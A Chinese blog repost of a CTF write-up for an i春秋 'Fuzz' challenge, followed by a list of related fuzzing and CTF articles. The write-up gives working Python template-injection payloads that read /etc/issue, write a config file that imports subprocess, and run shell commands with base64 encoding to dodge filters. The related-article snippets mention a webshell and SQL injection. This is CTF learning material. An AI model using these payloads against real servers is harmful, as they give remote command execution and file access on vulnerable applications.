i春秋Fuzz

最新推荐文章于 2022-10-15 08:57:11 发布
最新推荐文章于 2022-10-15 08:57:11 发布
阅读量372 收藏
点赞数
文章标签: shell python
原文链接:http://www.cnblogs.com/wosun/p/11505905.html
版权

点开只有三个单词plz fuzz parameter

大概意思就是让我们疯狂尝试参数。。。

我们通过url尝试传入参数

?user=123

?name=123

?username=123

?id=123

但参数为name时返回正确值

 

 

尝试在这里注入

 

 

。。。。。。

失败

但是这里会一直回显name后面的值

通过dalao们的无限测试后发现这里是python模板注入

 

 

 

 

再根据别人写的python模板注入的文章来跟着一步步注入

读版本文件:?name={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/issue').read() }}

SSTI漏洞注入:{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}   (这将向远程服务器写入一个文件,当编译完成为subprocess模块引入check_output方法,并将其设置指向变量RUNCMD。)

config对象添加一个新项:?name={{ config.from_pyfile('/tmp/owned.cfg') }}

通过向SSTI漏洞注入来检测是否成功:?name={{ config['RUNCMD']('/usr/bin/id',shell=True) }}

成功返回

 

 

小括号单引号中的内容即为我们可以使用cmd执行的代码

将其改为ls

 

 

可能被拦截了

base64先加密再解密的方法进行注入(bHMKlsbase64加密)

?name={{ config['RUNCMD']('`echo bHMK | base64 -d`',shell=True) }}

 

 

没有返回,尝试ls -al

?name={{ config['RUNCMD']('`echo bHMgLWFsCg== | base64 -d`',shell=True) }}

 

 

查看源码获得排列好的文件名

 

 

再查看var/www/html下的文件名

?name={{ config['RUNCMD']('`echo bHMgLWFsIC92YXIvd3d3L2h0bWwK | base64 -d`',shell=True) }}

 

 

查看fl4g文件(cat var/www/html/fl4g

?name={{ config['RUNCMD']('`echo Y2F0IC92YXIvd3d3L2h0bWwvZmw0Zwo= | base64 -d`',shell=True) }}

拿到flag

 

转载于:https://www.cnblogs.com/wosun/p/11505905.html

weixin_30701575
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
Automated_bounty_Hunter单域名全扫描“神器”—脚本
最新发布
afei001
09-20 250
Automated_bounty_Hunter单域名全扫描“神器”—脚本
暑期练习web16:fuzzing(i春秋)百度杯十月 md5解密脚本
qq_41618162的博客
08-21 1053
这题嘛。虽然名字叫fuzzing,但和fuzz似乎没什么关系。。 题目首页面就是一句话:show me your key 源码也没什么东西,索性我就直接get和post传值一下试试 结果post随便传个值及就出来了 这里说md5加密后的key是那一段字符串,直接丢到一些md5解密网上,解不开,这下我就纳闷了,查了资料才知道:md5理论上是不能破解的,因为md5采用的是不可逆算法。 有的网...
i春秋 一些题目
qq_30435981的博客
08-24 2162
VID 查看网页源代码发现有个文件路径  访问的看到了有三个参数用get方式提交  在url后提三个参数和对应的值就看到了一个1chunqiu.zip  访问就可以下载文件 这里需要进行代码审计  先看log.php界面 if(isset($_POST['username']) && isset($_POST['password']) &am...
FUZZ总结
醉等佳人归
08-25 9186
文章目录1.模糊测试器类型1.1.本地模糊器1.1.1.命令行模糊器1.1.2.环境变量模糊器1.1.3.文件格式模糊器1.1.4.寻找目录程序1.1.5.本地模糊测试方法1.2.远程模糊器1.2.1.网络协议模糊器1.2.2.web应用模糊器1.2.3.web浏览器模糊器1.3.内存模糊器 1.模糊测试器类型 1.1.本地模糊器 1.1.1.命令行模糊器 #include <string.h> int main(int argc,char **argv) { char buffer[10];
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
Fuzz工具使用详解
qq_22132931的博客
10-15 8292
wfuzz工具使用详解
“百度杯”CTF比赛 十一月场Fuzz
wjd19980925的博客
04-12 2852
“百度杯”CTF比赛 十一月场Fuzz i春秋
i春秋 2020新春战“疫”大赛(web部分)
qq_42812036的博客
02-25 805
ezupload 上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。 payload: cd / cat /readflag : ( 简单的招聘系统 payload admin' or 1# 进入admin,成功访问招聘界面blank page界面 key处存在sql注入 有5个字段,显位在2 可以猜测后端查询语句可能类似: selec...
CTF-练习平台 Web writeup By Assassin 暂时完结
qq_43679818的博客
11-13 4373
CTF-练习平台 Web writeup By Assassin 暂时完结
驱动程序FUZZ工具 Kdriver
07-21
作者:k0shl ####一些环境说明: 编译环境:Windows 10 x64 build 1607 项目IDE:VS2013 测试环境:Windows 7 x86、Windows 10 x86 build 1607 参数介绍: "-l" :开启日志记录模式(不会影响主日志记录模块) "-s" :驱动枚举模块 "-d" :打开设备驱动的名称 "-i" :待Fuzz的ioctl code,默认从0xnnnn0000-0xnnnnffff "-n" :在探测阶段采用null pointer模式,该模式下极易fuzz 到空指针引用漏洞,不加则常规探测模式 "-r" :指定明确的ioctl code范围 "-u" :只fuzz -i参数给定的ioctl code "-f" :在探测阶段采用0x00填充缓冲区 "-q" :在Fuzz阶段不显示填充input buffer的数据内容 "-e" :在探测和fuzz阶段打印错误信息(如getlasterror()) "-h" :帮助信息 ####常用Fuzz命令实例: kDriver Fuzz.exe -s 进行驱动枚举,将CreateFile成功的驱动设备名称,以及部分受限的驱动设备名称打印并写入Enum Driver.txt文件中 kDriver Fuzz.exe -d X -i 0xaabb0000 -f -l 对X驱动的ioctl code 0xaabb0000-0xaabbffff范围进行探测及对可用的ioctl code进行fuzz,探测时除了正常探测外增加0x00填充缓冲区探测,开启数据日志记录(如增加-u参数,则只对ioctl code 0xaabb0000探测,若是有效ioctl code则进入fuzz阶段) kDriver Fuzz.exe -d X -r 0xaabb1122-0xaabb3344 -n -l 对X驱动的ioctl code 0xaabb1122-0xaabb3344范围内进行探测,探测时采用null pointer模式,并数据日志记录
paramFuzzer:一款高效的参数fuzz工具|A faster param fuzzing test tool
04-14
paramFuzzer 一款高效的参数fuzz工具|A faster param fuzzing test tool 二分法暴力的Fuzz参数,本地测试23000+的字典1秒内跑完。 同等条件下,效率上肯定比其他工具快就对了. -u参数,-m参数是必须的,-p和-v分别是指定参数字典以及参数值,可有可无。 options: java -jar paramFuzzer.jar -h TODO LIST: 读取数据包。任意位置FUZZ。 识别中间件,再次加快FUZZ效率。
每周一书-《模糊测试-强制发掘安全漏洞的利器》
weixin_34125592的博客
09-26 328
    首先说明,本周活动有效时间为2016年9月26日到2016年10月9日。本周为大家送出的书是由电子工业出版社出版,段念,赵勇翻译的《模糊测试-强制发掘安全漏洞的利器》。   目在介绍这本书之前,首先要感谢微信号为:631682315(FEIYU)同学赠送给玄魂工作室的内容读者的。 前言/序言 在图上可以看到,FEIYU同学正在招聘代码审计,感兴趣的读者可以直接加他的微信...
方法参数
Fuzz
07-16 481
通过重载类的构造器方法,可以采用多种形式设置类的实例域的初始状态。确保不管怎样调用构造器,每个实例域都可以被设置为一个有意义的初值,这是一种很好的编程习惯。 class Employee { private String name = ""; } 当然了,初始值不一定都是常量值。也可以用方法对域进行初始化。例如: class Employee { private stat...
请求参数与请求头FUZZ(参考“我的Web应用安全模糊测试之路“)
weixin_50464560的博客
10-27 2255
参考# 大佬的文章 我的Web应用安全模糊测试之路 WebFuzzing方法和漏洞案例总结 实战笔记之服务端逻辑重构漏洞 大佬的字典 fuzzDicts 前言# 加一个参数就是一个洞。在挖洞的时候,我注意到一些特殊的请求参数,比如说 output、retype、callback、fun、width、height 等等,更改其中一些数值,返回包中会出现明显变化。看了大师傅们的文章,才逐渐了解到这些参数以及一些特殊的 http 头的妙用。此文作为一个笔记梳理,并自己尝试写了一个简单脚本(经测试,BUG 巨.
i春秋 WEB fuzzing
A_dmin的博客
06-16 1616
i春秋 WEB fuzzing 一天一道CTF题目,能多不能少 打开网页发现there is nothing,最后一通折腾什么都没有,最后进行抓包,得到提示: 按照提示应该是要构造ip,使用X-Forwarded-For 还有个提示是它要大的内部网络,直接将常用内网IP段都试下 尝试到10.0.0.0的时候得到一个新的提示: 进入得到新的提示,需要传递一个key? 发现get传递不行,改为...
i春秋百度杯十一月第二场WriteUp
chengman3837的博客
02-10 593
百度杯地址:http://www.ichunqiu.com/racing 题目:嘀嘀嘀 ..-. .-.. .- --. . --... .---- -.-. .- ..... -.-. -.. -....- --... -.. -... ----. -....- ....- -... .-...
Fuzzing技术总结(Brief Surveys on Fuzz Testing)- wcventure
热门推荐
wcventure的博客
08-26 3万+
Fuzzing survey Static analysis Dynamic analysis Symbolic execution Fuzzing White box fuzzing Grey box fuzzing Black box fuzzing Generation-based Fuzzing Mutation-based Fuzzing Fuzzing技术的对比 F...
百度杯 "2017春秋欢乐赛 攻击"
h3110n3w0r1d
04-05 1044
打开题目网址,代码就被高亮出来 <?php header("content-type:text/html;charset=utf-8"); show_source(__FILE__); echo '<pre>'; include('u/ip.php'); include('flag.php'); if (in_array($_SERVER['REMOTE_ADDR'],$ip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值